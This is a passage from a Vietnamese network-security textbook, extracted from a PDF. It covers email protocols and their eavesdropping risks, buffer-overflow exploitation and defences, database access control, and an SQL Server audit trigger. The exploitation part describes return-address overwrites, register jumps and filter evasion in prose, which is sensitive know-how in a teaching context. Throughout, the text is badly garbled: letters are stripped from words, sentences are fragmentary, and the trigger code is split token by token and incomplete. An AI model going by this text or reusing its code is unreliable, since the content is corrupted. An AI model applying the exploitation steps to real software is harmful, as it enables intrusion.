VRFY
NOOP
QUIT
SEND
6, 2012
SMTP Headers
C th ly c rt nhiu thng tin c ch bng cch kim tra phn header ca th.
Khng ch xem c bc in t u n, ch ca th, ngy gi v nhng ngi
nhn. Bn cn c th xem c nhng im m bc in i qua trc khi n c
hp th ca bn. Tiu chun RFC 822 qu y nh header cha nhng g. Ti thiu c
ngi gi (from), ngy gi v ngi nhn (TO, CC, hoc BCC)
6, 2012
Header ca th khi nhn c cho php bn xem bc in i qua nhng u trc khi
n hp th ca bn. N l mt dng c rt tt kim tra v gii quyt li. Sau y l
v d:
From someone@mydomain.COM Sat Jul 31 11:33:00 1999
Received:
from
host1.mydomain.com
by
host2.mydomain.com
(8.8.8+Sun/8.8.8)
with ESMTP id LAA21968 for ;
Sat, 31 Jul 1999 11:33:00 -0400 (EDT)
Received: by host1.mydomain.com with Interne Mail Service
(5.0.1460.8)
id ; Sat, 31 Jul 1999 11:34:39 -0400 Message-ID:
From: "Your Friend"
To: "'jamisonn@host2.mydomain.com'" Subject: Hello
There
Date: Sat, 31 Jul 1999 11:34:36 -0400
Trn v d trn c th thy bc in c gi i t someone@m ydomain.com. T
mydomain.com, n c chuyn n host1. Bc in c gi t host2 ti host1 v
chuyn ti ngi dng. Mi ch bc in dng li th host nhn c yu cu in thm
thng tin vo header n bao gm ngy gi tm dng . Host2 thng bo rngn
nhn c in lc11:33:00. Host1 thng bo rng n nhn c bc in vo lc
11:34:36, S trn lch hn mt pht c kh nng l do s khng ng b gia ng h
ca hai ni.
Thun li v bt li ca SMTP
Nh th tc X.400, SMTP c mt s thun li v bt li
Thun li bao gm:
SMTP rt ph bin.
N c h tr bi nhiu t chc.
SMTP c gi thnh qun tr v duy tr thp.
SMTP n c cu trc a ch n gin.
Bt li bao gm:
SMTP thiu mt s chc nng
SMTP thit kh nng bo mt nh X.400.
Page | 181 Copyright by Tocbatdat
6, 2012
Miu t
USER
Xc nh username
PASS
Xc nh password
STAT
Yu cu v trng thi ca hp th nh s
Khng lm g c
RSET
QUIT
6, 2012
Miu t
CAPABILITY
Chn hp th
EXAMINE
in hp th ch c php c
CREATE
To hp th
DELETE
Xo hp th
Lnh
Miu t
i tn hp th
RENAME
SUBSCRIBE
Danh sch hp th
6, 2012
LSUB
nh
FETCH
STORE
Khng lm g
ng kt ni
6, 2012
H tr s dng nhiu hp th
c bit h tr cho cc ch vic lm vic online, offline, hoc khng kt ni IMAP4
ch online th h tr cho vic ly tp hp cc th t my ch, tm kim v l y message
cn tm v ...IMAP4 cng cho php ngi dng chuyn th t th mc ny ca my ch
sang th mc khc hoc xo th. IMAP4 h tr rt tt cho ngi dng hay phi di chuyn
v phi s dng cc my tnh khc nhau.
b. Cc nguy c b tn cng khi s dng Email
b.1 S thiu bo mt trong h thng
email
Webmail: nu kt ni ti Webmail Server l khng an ton (v d a ch l http:// vkhng
phi l https://), lc mi thng tin bao gm Username v pasword khng c m ha
khi n t Webmail Server ti my tnh.
SMTP: SMTP khng m ha thng ip. Mi kt ni gia SMTP servers gi thng
ip ca bn di dng ch cho mi k nghe trm thy. Thm vo , nu email server
yu cu bn gi username v password login vo SMTP server mc ch
chuyn thng ip ti mt server khc, khi tt c u c gi di dng ch, mc
tiu nghe trm. Cui cng, thng ip gi bng SMTP bao gm thng tin v m y
tnh m chng c gi i, v chng trnh email c s dng. Nhng thng tin
ny sn sng cho mi ngi nhn, c th mang tnh cht c nhn.
POP v IMAP: Giao thc POP v IMAP yu cu bn gi username v password login,
u khng c m ha. V vy, thng ip ca bn c th c c bi bt k k no ang
nghe ln thng tin ca my tnh cng nh nh cung cp dch v email ca bn.
Backups: thng ip c lu tr trn SMTP server di dng ch, khng c
m ha.Vic Sao lu d liu trn server c th c thc hin bt c lc no v ngi
qun tr c th c bt k d liu no trn my tnh.
b.2 Cc nguy c trong qu trnh gi email
Eavesdropping:
Internet l ni rng ln vi rt nhiu ngi. Tht d dng ai truy cp vo my tnh hoc
on mng m thng tin ca bn ang c truyn trn , bt thng tin v c. Ging nh ai
ang phng k bn ang lng nghe cuc ni chuyn in thoi ca bn, hacker c th s
dng cc cng c man-in-the-middle bt ton b cc gi tin t ngi s dng email. Vic ny
c th c thc hin mt cch d dng thng qua cc chng trnh nh Cain&Abel, Ettercap...
6, 2012
6, 2012
6, 2012
c s cho nhiu th thut khai thc (exploit). Vic kim tra bin (bounds checking) y bi
lp trnh vin hoc trnh bin dch c th ngn chn cc li trn b m.
b. M t k thut
Mt li trn b nh m xy ra khi d liu c vit vo mt b nh m, m do khng kim
tra bin y nn ghi ln vng b nh lin k v lm hng cc gi tr d liu ti cc
a ch b nh k vi vng b nh m . Hin tng ny hay xy ra nht khi sao chp mt
xu k t t mt b nh m ny sang mt vng b nh m khc.
c. V d c bn
Trong v d sau, mt chng trnh nh ngha hai phn t d liu k nhau trong b nh: A l
mt b nh m xu k t di 8 bytes, v B l mt s nguyn kch thc 2 byte. Ban u, A
ch cha ton cc byte gi tr 0, cn B cha gi tr 3. Cc k t c kch thc 1 byte. By gi,
chng trnh ghi mt xu k t "excessive" vo b m A, theo sau l mt byte 0 nh du
kt thc xu. V khng kim tra di xu, nn xu k t mi ln gi tr ca B:
Tuy lp trnh vin khng c nh sa i B, nhng gi tr ca B b thay th bi mt s
c to nn t phn cui ca xu k t. Trong v d ny, trn mt h thng big-endian s
dng m ASCII, k t "e" v tip theo l mt byte 0 s tr thnh s 25856.
Nu B l phn t d liu duy nht cn li trong s cc bin c chng trnh nh ngha,
vic vit mt xu k t di hn na v vt qu phn cui ca B s c th gy ra mt li
chng hn nh segmentation fault (li phn on) v tin trnh s kt thc.
d. Trn b nh m trn stack
Bn cnh vic sa i cc bin khng lin quan, hin tng trn b m cn thng b li
dng (khai thc) bi tin tc lm cho mt chng trnh ang chy thc thi mt on m ty
c cung cp. Cc k thut mt tin tc chim quyn iu khin mt tin trnh ty theo
vng b nh m b m c t ti . V d, vng b nh stack, ni d liu c th c
tm thi "y" xung "nh" ngn xp (push), v sau c "nhc ra" (pop) c gi tr
ca bin. Thng thng, khi mt hm (function) bt u thc thi, cc phn t d liu tm thi
(cc bin a phng) c y vo, v chng trnh c th truy nhp n cc d liu ny
trong sut thi gian chy hm . Khng ch c hin tng trn stack (stack overflow) m cn
c c trn heap (heap overflow).
Trong v d sau, "X" l d liu tng nm ti stack khi chng trnh bt u thc thi; sau
chng trnh gi hm "Y", hm ny i hi mt lng nh b nh cho ring mnh; v sau
"Y" gi hm "Z", "Z" i hi mt b nh m ln:
Nu hm "Z" gy trn b nh m, n c th ghi d liu thuc v hm Y hay chng trnh
chnh:
iu ny c bit nghim trng i vi hu ht cc h thng. Ngoi cc d liu thng, b
nh stack cn lu gi a ch tr v, ngha l v tr ca phn chng trnh ang chy trc khi
hm hin ti c gi. Khi hm kt thc, vng b nh tm thi s c ly ra khi stack, v
Page | 188 Copyright by Tocbatdat
6, 2012
6, 2012
if (argc < 2)
{
fprintf(stderr, "USAGE: %s string\n", argv[0]);
return 1;
}
strncpy(buffer, argv[1], sizeof(buffer));
buffer[sizeof(buffer) - 1] = '\0';
return 0;
}
*******
f. Khai thc
C cc k thut khc nhau cho vic khai thc li trn b nh m, ty theo kin trc my tnh,
h iu hnh v vng b nh. V d, khai thc ti heap (dng cho cc bin cp pht ng) rt
khc vi vic khai thc cc bin ti stack.
Khai thc li trn b m trn stack
Mt ngi dng tho k thut v c xu c th khai thc cc li trn b m trn stack
thao tng chng trnh theo mt trong cc cch sau: Ghi mt bin a phng nm gn b
nh m trong stack thay i hnh vi ca chng trnh nhm to thun li cho k tn cng.
Ghi a ch tr v trong mt khung stack (stack frame). Khi hm tr v, thc thi s c
tip tc ti a ch m k tn cng ch r, thng l ti mt b m cha d liu vo ca
ngi dng.
Nu khng bit a ch ca phn d liu ngi dng cung cp, nhng bit rng a ch ca n
c lu trong mt thanh ghi, th c th ghi ln a ch tr v mt gi tr l a ch ca mt
opcode m opcode ny s c tc dng lm cho thc thi nhy n phn d liu ngi dng. C
th, nu a ch on m c hi mun chy c ghi trong mt thanh ghi R, th mt lnh
nhy n v tr cha opcode cho mt lnh jump R, call R (hay mt lnh tng t vi hiu ng
nhy n a chi ghi trong R) s lm cho on m trong phn d liu ngi dng c thc
thi. C th tm thy a ch ca cc opcode hay cc byte thch hp trong b nh ti cc th
vin lin kt ng (DLL) hay trong chnh file thc thi. Tuy nhin, a ch ca opcode
thng khng c cha mt k t null (hay byte 0) no, v a ch ca cc opcode ny c
th khc nhau ty theo cc ng dng v cc phin bn ca h iu hnh.D n Metapoloit l
mt trong cc c s d liu cha cc opcode thch hp, tuy rng trong ch lit k cc
opcode trong h iu hnh Microsoft Windows.
Khai thc li trn b m trn heap
Mt hin tng trn b m xy ra trong khu vc d liu heap c gi l mt hin tng
trn heap v c th khai thc c bng cc k thut khc vi cc li trn stack. B nh heap
c cp pht ng bi cc ng dng ti thi gian chy v thng cha d liu ca chng
trnh. Vic khai thc c thc hin bng cch ph d liu ny theo cc cch c bit lm
Page | 190 Copyright by Tocbatdat
6, 2012
cho ng dng ghi ln cc cu trc d liu ni b chng hn cc con tr ca danh sch lin
kt. L hng ca Microsoft JPG GDI+l mt v d gn y v s nguy him m mt li trn
heap.
Cn tr i vi cc th thut khai thc
Vic x l b m trc khi c hay thc thi n c th lm tht bi cc c gng khai thc li
trn b m. Cc x l ny c th gim bt mi e da ca vic khai thc li, nhng c th
khng ngn chn c mt cch tuyt i. Vic x l c th bao gm: chuyn t ch hoa
thnh ch thng, loi b cc k t t bit (metacharacters) v lc cc xu khng cha k t l
ch s hoc ch ci. Tuy nhin, c cc k thut trnh vic lc v x l ny;
alphanumeric code (m gm ton ch v s), polymorphic code (m a hnh), Self-modifying
code (m t sa i) v tn cng kiu return-to-libc.. Cng chnh cc phng php ny c th
c dng trnh b pht hin bi cc h thng pht hin thm nhp (Intrusion detection
system).
g. Chng trn b m
Nhiu k thut a dng vi nhiu u nhc im c s dng pht hin hoc ngn
chn hin tng trn b m. Cch ng tin cy nht trnh hoc ngn chn trn b m l
s dng bo v t ng ti mc ngn ng lp trnh. Tuy nhin, loi bo v ny khng th p
dng cho m tha k (legacy code), v nhiu khi cc rng buc k thut, kinh doanh hay vn
ha li i hi s dng mt ngn ng khng an ton. Cc mc sau y m t cc la chn v
ci t hin c.
La chn ngn ng lp trnh
La chn v ngn ng lp trnh c th c mt nh hng ln i vi s xut hin ca li trn
b m. Nm 2006, C v C++ nm trong s cc ngn ng lp trnh thng dng nht, vi mt
lng khng l cc phn mm c vit bng hai ngn ng ny. C v C++ khng cung cp
sn cc c ch chng li vic truy nhp hoc ghi d liu ln bt c phn no ca b nh
thng qua cc con tr bt hp l; c th, hai ngn ng ny khng kim tra xem d liu c
ghi vo mt mng ci t ca mt b nh m) c nm trong bin ca mng hay khng.
Tuy nhin, cn lu rng cc th vin chun ca C++, th vin khun mu chun - STL,
cung cp nhiu cch an ton lu tr d liu trong b m, v cc lp trnh vin C cng c
th to v s dng cc tin ch tng t. Cng nh i vi cc tnh nng bt k khc ca C
hay C++, mi lp trnh vin phi t xc nh la chn xem h c mun chp nhn cc hn ch
v tc chng trnh thu li cc li ch tim nng ( an ton ca chng trnh) hay
khng.
Mt s bin th ca C, chng hn Cyclone, gip ngn chn hn na cc li trn b m bng
vic chng hn nh gn thng tin v kch thc mng vi cc mng. Ngn ng lp trnh D s
dng nhiu k thut a dng trnh gn ht vic s dng con tr v kim tra bin do ngi
dng xc nh.
6, 2012
Nhiu ngn ng lp trnh khc cung cp vic kim tra ti thi gian chy, vic kim tra ny gi
mt cnh bo hoc ngoi l khi C hoc C++ ghi d liu. V d v cc ngn ng ny rt a
dng, t pythol ti Ada, t Lisp ti Modula-2, v t Smalltalk ti OCaml. Cc mi trng
bytecode ca Java v .NET cng i hi kim tra bin i vi tt c cc mng. Gn nh tt c
cc ngn ng thng dch s bo v chng trnh trc cc hin tng trn b m bng cch
thng bo mt trng thi li nh r (well-defined error). Thng thng, khi mt ngn ng
cung cp thng tin v kiu thc hin kim tra bin, ngn ng thng cho php la
chn kch hot hay tt ch . Vic phn tch tnh (static analysis) c th loi c nhiu
kim tra kiu v bin ng, nhng cc ci t ti v cc trng hp ri rm c th gim ng
k hiu nng. Cc k s phn mm phi cn thn cn nhc gia cc ph tn cho an ton v
hiu nng khi quyt nh s s dng ngn ng no v cu hnh nh th no cho trnh bin
dch.
S dng cc th vin an ton
Vn trn b m thng gp trong C v C++ v cc ngn ng ny l cc chi tit biu
din mc thp ca cc b nh m vi vai tr cc ch cha cho cc kiu d liu. Do , phi
trnh trn b m bng cch gn gi tnh ng n cao cho cc phn m chng trnh thc
hin vic qun l b m. Vic s dng cc th vin c vit tt v c kim th, dnh
cho cc kiu d liu tru tng m cc th vin ny thc hin t ng vic qun l b nh,
trong c kim tra bin, c th lm gim s xut hin v nh hng ca cc hin tng trn
b m. Trong cc ngn ng ny, xu k t v mng l hai kiu d liu chnh m ti cc
hin tng trn b m thng xy ra; do , cc th vin ngn chn li trn b m ti cc
kiu d liu ny c th cung cp phn chnh ca s che chn cn thit. D vy, vic s dng
cc th vin an ton mt cch khng ng c th dn n trn b m v mt s l hng
khc; v tt nhin, mt li bt k trong chnh th vin chnh n cng l mt l hng. Cc ci
t th vin "an ton" gm The Better String Library, Arri Buffer API v Vstr. Th vin C
ca h iu hnh OpenBSD cung cp cc hm hu ch strlcpy strlcat nhng cc hm ny
nhiu hn ch hn nhiu so vi cc ci t th vin an ton y .
Thng 9 nm 2006, Bo co k thut s 24731 ca hi ng tiu chun C c cng b,
bo co ny m t mt tp cc hm mi da trn cc hm vo ra d liu v cc hm x l xu
k t ca th vin C chun, cc hm mi ny c b sung cc tham s v kch thc b
m.
Chng trn b nh m trn stack
Stack-smashing protection l k thut c dng pht hin cc hin tng trn b m ph
bin nht. K thut ny kim tra xem stack b sa i hay cha khi mt hm tr v. Nu
stack b sa , chng trnh kt thc bng mt li segmentation fault. Cc h thng s
dng k thut ny gm c Libsafe, StackGuard v cc bn v li (patch) Propolicy.
Ch Data Execution Prevention (cm thc thi d liu) ca Microsoft bo v thng cc con
tr ti SEH Exception Handler, khng cho chng b ghi .
6, 2012
C th bo v stack hn na bng cch phn tch stack thnh hai phn, mt phn dnh cho d
liu v mt phn cho cc bc tr v ca hm. S phn chia ny c dng trong ngn ng
lp trnh Forth, tuy n khng phi mt quyt nh thit k da theo tiu ch an ton. Nhng d
sao th y cng khng phi mt gii php hon chnh i vi vn trn b m, khi cc d
liu nhy cm khng phi a ch tr v vn c th b ghi .
Bo v khng gian thc thi
Bo v khng gian thc thi l mt cch tip cn i vi vic chng trn b m. K thut ny
ngn chn vic thc thi m ti stack hay heap. Mt k tn cng c th s dng trn b m
chn mt on m ty vo b nh ca mt chng trnh, nhng vi bo v khng gian thc
thi, mi c gng chy on m s gy ra mt ngoi l (exception).
Mt s CPU h tr mt tnh nng c tn bit NX ("No eXecute" - "Khng thc thi") hoc bit
XD ("eXecute Disabled" - "ch thc thi b tt" ). Khi kt hp vi phn mm, cc tnh
nng ny c th c dng nh du cc trang d liu (chng hn cc trang cha stack v
heap) l c c nhng khng thc thi c.
Mt s h iu hnh Unix (chng hn OpenBSD, Mac OS X) c km theo tnh nng bo v
khng gian thc thi. Mt s gi phn mm ty chn bao gm:
PaX
Exec Shield
Openwall
Cc bin th mi ca Microsoft Windows cng h tr bo v khng gian thc thi, vi tn gi
Data Execution Prevention (ngn chn thc thi d liu). Cc phn mm gn km (Add-on) bao
gm: SecureStack OverflowGuard BufferShield StackDefender
Phng php bo v khng gian thc thi khng chng li c tn cng return-to-libc.
Ngu nhin ha s khng gian a ch
Ngu nhin ha s khng gian a ch (Address space layout randomization - ASLR) l
mt tnh nng an ninh my tnh c lin quan n vic sp xp v tr cc vng d liu quan
trng (thng bao gm ni cha m thc thi v v tr cc th vin, heap v stack) mt cch
ngu nhin trong khng gian a ch ca mt tin trnh.
Vic ngu nhin ha cc a ch b nh o m cc hm v bin nm ti lm cho vic khai
thc mt li trn b m tr nn kh khn hn, nhng phi l khng th c. N cn buc
k tn cng phi iu chnh khai thc cho hp vi tng h thng c th, iu ny lm tht bi
c gng ca cc con Su internet Mt phng php tng t nhng km hiu qu hn, l
k thut rebase i vi cc tin trnh v th vin trong khng gian a ch o.
Kim tra su i vi gi tin
Bin php kim tra su i vi gi tin (deep packet inspection - DPI) c th pht hin cc c
gng t xa khai thc li trn b m ngay t bin gii mng. Cc k thut ny c kh nng
chn cc gi tin c cha ch k ca mt v tn cng bit hoc cha mt chui di cc lnh
No-Operation (NOP - lnh rng khng lm g), cc chui nh vy thng c s dng khi v
tr ca ni dung quan trng (payload) ca tn cng hi c bin i.
Page | 193 Copyright by Tocbatdat
6, 2012
V.
AN TON D LIU
1. An ton c s d liu
C s d liu ca mt c quan, mt x nghip, ca mt ngnh... thng c ci t tp trung
hay phn tn trn cc my ch trn mng, l ti nguyn thng tin chung cho nhiu ngi cng s
dng. V vy cc h c s d liu cn phi c c ch kim sot, qun l v truy xut khai thc
Page | 194 Copyright by Tocbatdat
6, 2012
thng tin sao cho d liu phi c an ton v ton vn. Thut ng an ton d liu c ngha l
cc h c s d liu cn phi c bo v chng truy nhp nhm sa i hay ph hoi mt cch
ch nh hay khng ch nh. Nh vy cc h thng c s d liu cn thit phi qun tr, bo
v tp trung, nhm bo m c tnh ton vn v an ton d liu. Ton vn d liu khc vi
an ton d liu, tuy rng chng c mi quan h mt thit vi nhau. C th s dng chung mt s
bin php thc hin. C rt nhiu mi nguy him e do n cc h thng d liu:
Nhiu ngi s dng truy nhp v khai thc trn cng mt c s d liu.
Truy xut vo cc h c s d liu bng nhiu ngn ng thao tc d liu khc nhau,
bng nhiu h ng dng khc nhau trn cng mt ni dung thng tin.
V vy c th xy ra
Nhng sai st ngoi mun, khi thc hin thm, sa, xo hay do li khi lp trnh.
Truy nhp tri php vi mc ch xu: sa, xo thng tin hay nh cp thng tin...
6, 2012
Nhn din ngi s dng: T nh ngha an ton d liu c th suy ra rng, h qun tr c
s d liu DBMS khng cho php ngi s dng c thc hin mt thao tc no nu khng
c php ca ngi qun tr CSDL. Ngi qun tr CSDL phi:
Kim tra truy nhp: Vi mi ngi s dng h thng s qun l mt h s c pht sinh
t vic cc chi tit v th tc xut trnh, xc minh v cc chi tit c quyn thao tc m ngi
qun tr c s d liu cp cho ngi s dng. H thng s kim tra tnh php l ca mi mt thao
tc ca ngi s dng. V d yu cu c c li nh gi hng nm ca mi mt nhn vin, ch
c th c php nu c s d liu c cha thng tin quy nh rng ngi yu cu phi l Gim
c, trng, ph phng t chc, chnh vn phng. Tt c cc i tng khc khng c trong c
s d liu khng c php truy xut. DBMS s kim tra
mi mt thao tc ca ngi s dng xem c vi phm cc rng buc an ton hay khng,
nu c s phi hu b. Mt rng buc truy nhp ni chung c lin quan n mt b phn ca c
s d liu. Do tn ti mt c quyn thch hp, gi s l chng trnh s kim tra mi mt yu
cu ca ngi s dng. Chng trnh s sp xp quyn truy nhp theo mc phc tp tng dn
sao cho t ti quyt nh cui cng nhanh nht c th.
6, 2012
Chn mt cch hp php: l cho php ngi s dng c chn thm d liu mi
vo c s d liu, nhng khng sa i d liu hin c.
Ngi s dng cm c thuc tnh nhn xt hng nm, cc thuc tnh mc lng v
ngy ln lng c c v sa i, cc thuc tnh khc ch c c. Cng vic ch c thc
hin trong khong thi gian t 9 gi n 11 gi trong cc ngy ca tun cui thng.
Ngi s dng c quyn s dng cc php ton thng k cho thuc tnh mc lng tnh
mc lng trung bnh trong tng n v. Cm sa i d liu.
d. Khung nhn mt c ch bo v
Khung nhn, bng cch nh ngha li c s d liu khi nim, khng ch to iu kin thun
li khi lp trnh trnh ng dng v lm tng tnh c lp d liu logic, m cn c s dng
nh mt c ch bo v. C hai loi khung nhn. Loi khung nhn ch c, khng cho php sa
Page | 197 Copyright by Tocbatdat
6, 2012
i. Loi khung ny gi l khung ch c.Trong nhiu trng hp, ngi qun tr CSDL cho
php ngi s dng ny c c d liu, nhng ngi khc va c c, va c quyn
sa i, b sung...Loi khung nhn th hai cho php c v ghi ln cc thnh phn ca khung
nhn. v mi sa i cho khung nhn c th c lu trong lc khi nim. SQL xut cho
php c/ghi cc khung nhn trong mt phm vi nht nh. Vi phng php ny thit k cc
chng trnh ng dng linh hot hn loi khung ch c. Tuy nhin, khi thao tc cp nht trn cc
khung nhn c/ghi thng gy tc ng n mt s thnh phn ca c s d liu khng nm
trong khung nhn. V d trong mt h CSDL phn cp, trong khung nhn ch c kiu bn ghi gc,
khng c bn ghi ph thuc. Nu xa xut hin ca kiu bn ghi nay, ko theo phi xa cc xut
hin bn ghi ph thuc. y l mt hnh ng khng hp l, vi phm nguyn tc khng cho
ngi s dng c php xa mt i tng m h khng thy c trong khung nhn. Cng
tng t nh trong m hnh mng, nu xa mt bn ghi khi khng bit cc bn ghi khc nm
ngoi khung nhn bhng c quan h vi n. V nhiu trng hp khc tng t. V vy, tt c
cc h qun tr c s d liu .DBMS gii hn quyn cp nht cc khung nhn trong mt s trng
hp c th.
V d v hot ng ca ngn hng, mt th k cn bit tn ca tt c cc khch hng c cc
khon vay ti nhiu chi nhnh. Ngi th k ny khng c php xem nhng thng tin v
khon vay c bit m khch hng c th c. Hnh ng ca c th k b t chi khi truy nhp
trc tip ti quan h cho vay, nhng c th truy nhp bng khung nhn cust-loan bao gm cc
thng tin nh: tn ca khch hng v chi nhnh ni m khch c khon vay. Khung nhn ny
c th c nh ngha trong SQL nh sau:
CREATE VIEW cust-loan AS
(SELECT branch-name, customer-name
FROM borrower, loan
WHERE borrower.loan-number = loan.loan-number)
Gi s rng c th k a ra truy vn SQL nh sau:
SELECT *
FROM cust-loan
Nh vy ngi th k c php xem kt qu ca truy vn trn, tuy nhin qu trnh x l truy
vn ny s c thc hin trn cc quan h BORROWER and LOAN. V vy h thng phi kim
tra cc quyn hn trn truy vn ca th k trc khi bt u qu trnh x l truy vn. Vic to
mt khung nhn khng ph thuc vo cc quan h ngun. Mt ngi s dng to ra mt khung
nhn khng c nhn tt c cc c quyn trn khung nhn. V d, ngi s dng khng c
quyn cp nht trn khung nhn nu khng c quyn cp nht vo quan h bng khung nhn
c nh ngha. Nu ngi s dng to ra mt khung nhn trn nhng quyn hn khng
c php, th h thng s ph nhn yu cu to khung nhn. Trong v d khung nhn cust-loan
trn, ngi to khung nhn phi c quyn c trn c hai quan h BORROWER and LOAN.
e. Cp php cc quyn truy nhp
Mt ngi s dng c cp mt vi quyn truy nhp c s d liu v cc quyn hn ny c
th tham chiu n quyn truy nhp ca ngi s dng khc. Tuy nhin ngi qun tr c s
d liu cng cn phi c bit lu khi cc quyn ny lu thng qua gia nhiu ngi s
dng, sao cho cc quyn ny c th c thu hi ti mt thi im ty .
Hnh 1
6, 2012
V d, gi s khi khi to, ngi qun tr c s d liu cp quyn cp nht d liu trn quan
h LOAN ca c s d liu ngn hng cho ngi s dng U1, U2 v U3 v quyn c th trong
th t thng qua quyn hn n cc quyn ca nhng ngi s dng khc. Lin thng cc quyn
t mt ngi s dng ny ti ngi s dng khc c m t bng mt th quyn hn. th
bao gm cc nt l nhng ngi s dng v cc cnh Ui Uj nu ngi s dng Ui cp
quyn cp nht trn LOAN cho ngi s dng Uj. Gc ca th l ngi qun tr c s d
liu. Trong hnh 1, ngi s dng U5 c cp quyn hn bi hai ngi s dng U1 v U2
v ngu s dng U4 c cp quyn s dng ch bi U1.
Mt ngi s dng c quyn hn truy nhp vo c s d liu theo mt s quyn no khi v
ch khi (if and only if) c mt ng i t gc trn th quyn hn, tc l lin thng t nt
ngi qun tr c s d liu ti nt ngi s dng.
Gi s ngi qun tr c s d liu quyt nh thu hi cc quyn hn ca ngi s dng U1. V
ngi s dng U4 c quyn hn dn t U1 nn quyn hn ca U4 cng s b thu hi.
Tuy nhin, v U5 c cp quyn bi U1 v U2 , v th ngi qun tr c s d liu ch thu hi
t U1 dn U5, khng thu hi quyn cp nht trn LOAN ca U2. U5 vn cn quyn cp nht
trn quan h LOAN. Nu ngi qun tr thu hi quyn cp nht ca U2 th U5 s mt
quyn hn trn quan h LOAN.
Hnh 2 C gng hu b nhng quyn hn b thu hi
6, 2012
6, 2012
Hnh 3
f. Kim tra du vt
6, 2012
6, 2012
TABLE
(Type
TableName
PK
FieldName
OldValue
NewValue
UpdateDate
UserName VARCHAR(128))
Audit
CHAR(1),
VARCHAR(128),
VARCHAR(1000),
VARCHAR(128),
VARCHAR(1000),
VARCHAR(1000),
datetime,
PrimaryKeyField : kha chnh ca dng b xa (vi bng 1 kha chnh -Theo Agile, nu
bn mong mun khc i, hy customize code)
FieldName : Ct b xy ra action.
UserName : ngi dng (Ti s s dng user ca h thng, hy s dng username trn mt
table khc nh bn mun)
6, 2012
-Set
up
-Firstly,
we
create
-- There will only need to be one of these in a database
the
the
tables
table.
audit
the
use
of
this
tool
6, 2012
--note that for this system to work there must be a primary key to the table
--but then a table without a primary key isn't really a table is it?
ALTER TABLE trigtest ADD CONSTRAINT pk PRIMARY KEY (i, j)
GO
--and now create the
-table you want to monitor
CREATE
AS
TRIGGER
trigger
tr_trigtest
itself.
ON
This
trigtest
has
FOR
DECLARE
@bit
@field
@maxfield
@char
@fieldname
@TableName
@PKCols
@sql
@UpdateDate
@UserName
@Type
@PKSelect VARCHAR(1000)
-IF
to
be
created
INSERT,
for
UPDATE,
DELETE
INT
INT
INT
INT
VARCHAR(128)
VARCHAR(128)
VARCHAR(1000)
,
,
,
,
,
,
,
VARCHAR(2000),
VARCHAR(21)
,
VARCHAR(128)
,
CHAR(1)
,
@TableName
to
match
the
table
to
be
date
and
@UserName
=
SYSTEM_USER
@UpdateDate
=
CONVERT(VARCHAR(8),
GETDATE(),
+ ' ' + CONVERT(VARCHAR(12), GETDATE(), 114)
EXISTS
(SELECT
*
IF
EXISTS
(SELECT
SELECT
@Type
SELECT
ELSE
SELECT @Type = 'D'
-get
SELECT
*
INTO
SELECT * INTO #del FROM deleted
-Get
primary
SELECT
@PKCols
=
FROM
FROM
=
@Type
list
of
#ins
key
columns
for
COALESCE(@PKCols
+
every
user
,
112)
Action
inserted)
deleted)
'U'
ELSE
'I'
columns
inserted
FROM
full
'
audited
outer
and',
'
join
on')
+
FROM
AND
-SELECT
6, 2012
c.COLUMN_NAME
INFORMATION_SCHEMA.KEY_COLUMN_USAGE
c
WHERE
pk.TABLE_NAME
=
@TableName
AND
CONSTRAINT_TYPE
=
'PRIMARY
KEY'
AND
c.TABLE_NAME
=
pk.TABLE_NAME
c.CONSTRAINT_NAME = pk.CONSTRAINT_NAME
Get
primary
@PKSelect
select
for
insert
=
COALESCE(@PKSelect+'+','')
+
'''<'
+
COLUMN_NAME
+
'=''+convert(varchar(100),
coalesce(i.'
+
COLUMN_NAME
+',d.'
+
COLUMN_NAME
+
'))+''>'''
FROM
INFORMATION_SCHEMA.TABLE_CONSTRAINTS
pk
,
INFORMATION_SCHEMA.KEY_COLUMN_USAGE
c
WHERE
pk.TABLE_NAME
=
@TableName
AND
CONSTRAINT_TYPE
=
'PRIMARY
KEY'
AND
c.TABLE_NAME
=
pk.TABLE_NAME
AND c.CONSTRAINT_NAME = pk.CONSTRAINT_NAME
IF
BEGIN
key
@PKCols
RAISERROR('no
PK
IS
on
table
%s',
NULL
16,
-1,
@TableName)
RETURN
END
SELECT
=
0,
@maxfield
=
MAX(ORDINAL_POSITION)
FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME = @TableName
WHILE
@field
<
@maxfield
BEGIN
SELECT
@field
=
MIN(ORDINAL_POSITION)
FROM
INFORMATION_SCHEMA.COLUMNS
WHERE
TABLE_NAME
=
@TableName
AND
ORDINAL_POSITION
>
@field
SELECT
@bit
=
(@field
1
)%
8
+
1
SELECT
@bit
=
POWER(2,@bit
1)
SELECT
@char
=
((@field
1)
/
8)
+
1
IF SUBSTRING(COLUMNS_UPDATED(),@char, 1) & @bit > 0 OR @Type IN ('I','D')
BEGIN
SELECT
@fieldname
=
COLUMN_NAME
FROM
INFORMATION_SCHEMA.COLUMNS
WHERE
TABLE_NAME
=
@TableName
AND
ORDINAL_POSITION
=
@field
SELECT
@sql
=
'
insert
Audit
(
Type,
Page | 206 Copyright by Tocbatdat
@field
6, 2012
TableName,
PK,
FieldName,
OldValue,
NewValue,
UpdateDate,
UserName)
select
'''
+
@Type
+
''','''
+
@TableName
+
''','
+
@PKSelect
+
','''
+
@fieldname
+
''''
+
',convert(varchar(1000),d.'
+
@fieldname
+
')'
+
',convert(varchar(1000),i.'
+
@fieldname
+
')'
+
','''
+
@UpdateDate
+
''''
+
','''
+
@UserName
+
''''
+
'
from
#ins
i
full
outer
join
#del
d'
+
@PKCols
+
'
where
i.'
+
@fieldname
+
'
<>
d.'
+
@fieldname
+ ' or (i.' + @fieldname + ' is null and d.' + @fieldname + ' is not null)'
+ ' or (i.' + @fieldname + ' is not null and d.' + @fieldname + ' is null)'
EXEC
(@sql)
END
END
GO
------------------------------------------------------on m trn s lm vic hon ho, n s i vo s ca h thng v tm ra tt c nhng bng c
trong schema, sau to tng trigger theo mt template nht nh- Hy gii hn table hay column
bng cch customize li code ny.
Lu : on m ny thc hin trn Microsoft SQL Server v s dng trigger hy sa i cho ph
hp trn nhng database khc. iu ny khng th thc hin trn CSDL khng h tr trigger.
Li ch : tip cn thng qua ch mt table, iu ny mang n s thun tin v d dng khi qun
tr, nu h thng tip tc sinh si ra cc bng, khng phi l vn .
Bt li : Mt cht v vn Perfomance, vi cc Database trung bnh v nh, vic audit l bnh
thng, tuy nhin nu database ln khi s dng nhiu cu Insert v Delete s to ra nhng d liu
khng l trn tng dng (v n lu 1 field trn mt dng audit ).
